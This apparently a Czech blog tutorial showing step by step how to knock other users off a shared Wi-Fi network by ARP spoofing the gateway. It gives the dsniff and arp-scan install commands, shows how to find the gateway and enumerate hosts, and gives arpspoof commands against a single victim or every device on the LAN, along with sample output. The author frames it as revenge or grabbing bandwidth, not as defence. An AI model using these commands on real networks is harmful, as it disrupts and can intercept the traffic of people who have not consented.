WiFiKill na Ubuntu

Dnes si ukážeme malou fičuru, jak na bezdrátové síti vyblokovat provoz. Kdy takovou fintu fň budete chtít použít?

  • Když Vás někdo na***e 🙂
  • Když je na wifině tuna lidí a vy zrovna potřebujete pracovat

Podstata této metody je v podvržení defaultní gatewaye ostatních strojů v síti. Totiž každý telefon, který se připojí na router má defaultní gateway (česky brána). Jinými slovy router vašemu telefonu říká, že veškerý provoz má jít přes něj dál (ten router je ta brána do internetu). Pak náš PC už snadno komunikaci dropne. Na Androidech fičura  WiFi-kill spočívá v tom, že my všem ostatním strojům v síti řekneme, že data mají jít na náš počítač místo aby šli do internetu. A je vymalováno 🙂

Jak toto udělat? Pomocí arpspoofingu. ARP je v sítích lepidlo, kteřé tmelí dohromady dvě informace – MAC adresu počítače a jemu přiřazenou IP adresu. Když my řekneme routeru, že jeho MAC není jeho ale naše, všichni ostatní mají po legraci.

Pojďme si to ukázat v praxi.

Nainstalujte si balíček dsniff. Jeden z jeho nástrojů je právě arpspoof

sudo apt-get install dsniff

počtěmě si o tomto balíčku z manuálu

man arpspoof
ARPSPOOF(8) System Manager's Manual ARPSPOOF(8)

NAME
arpspoof - intercept packets on a switched LAN

SYNOPSIS
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

DESCRIPTION
arpspoof redirects packets from a target host (or all hosts) on the
LAN intended for another host on the LAN by forging ARP replies. This
is an extremely effective way of sniffing traffic on a switch.

Kernel IP forwarding (or a userland program which accomplishes the
same, e.g. fragrouter(8)) must be turned on ahead of time.

OPTIONS
-i interface
Specify the interface to use.

-c own|host|both
Specify which hardware address t use when restoring the arp
configuration; while cleaning up, packets can be send with the
own address as well as with the address of the host. Sending
packets with a fake hw address can disrupt connectivity with
certain switch/ap/bridge configurations, however it works more
reliably than using the own address, which is the default way
arpspoof cleans up afterwards.

-t target
Specify a particular host to ARP poison (if not specified, all
hosts on the LAN). Repeat to specify multiple hosts.

-r Poison both hosts (host and target) to capture traffic in both
directions. (only valid in conjuntion with -t)

host Specify the host you wish to intercept packets for (usually the local gateway).

SEE ALSO
dsniff(8), fragrouter(8)

AUTHOR
Dug Song <dugsong@monkey.org>

 

očekujte jaká je ve vašem PC defaultní gateway na fwifině, na které jste připojeni příkazem route -n

zly@zaskodnik:~$ route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.0.1 0.0.0.0 UG 600 0 0 wlan0

Pokud patříte mezi script kiddies, které neví co dělají ale důležité je, že něco dělají, ulehčím Vám. Zadejte tupý příkaz

route -n|grep ^0.0.0.0|cut -d' ' -f 10

Vyhodí vám to něco jako:

zly@zaskodnik:~$ route -n|grep ^0.0.0.0|cut -d' ' -f 10
0.0.0.0
192.168.0.1

To druhé je hledaná defaultní gateway.

Teď si potřebujeme proscannovat okolí a stroje v síti. Pro to budeme potřebovat nějaký nástroj, buď IP angry scanner, nebo třeba arp-scan. Použijeme arp-scan, který nainstalujte příkazem

sudo apt-get install arp-scan

Zadáním tupého příkazu  sudo arp-scan -l –interface=wlan0 dostaneme nějaký výstup. V mém případě třeba:

zly@zaskodnik:~$ sudo arp-scan -l --interface=wlan0
Interface: wlan0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 10:fe:ed:2b:7b:20 TP-LINK TECHNOLOGIES CO., LTD.
192.168.0.108 0c:8f:ff:70:59:55 (Unknown)
192.168.0.110 00:04:4b:30:02:0d NVIDIA
192.168.0.102 c8:d7:b0:29:23:49 (Unknown)
192.168.0.114 04:b1:67:19:bb:f6 (Unknown)

Vidíme stoje v síti. Když budeme chtít odstřelit jen jednu mašinu, uděláme to příkazem sudo arpspoof -t $IPobeti $defaultGw, takže třeba:

arpspoof -t 192.168.0.108 192.168.0.1

A pokud budeme chtít odstřelit úplně všechny kromě nás, uděláme to příkazem  sudo arpspoof $defaultGw,  například:

sudo arpspoof 192.168.0.1

zly@zaskodnik:~$ sudo arpspoof 192.168.0.1
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a
0:1b:b1:a2:ed:9a ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:1b:b1:a2:ed:9a

Hotovo 🙂 A zlo je na světě.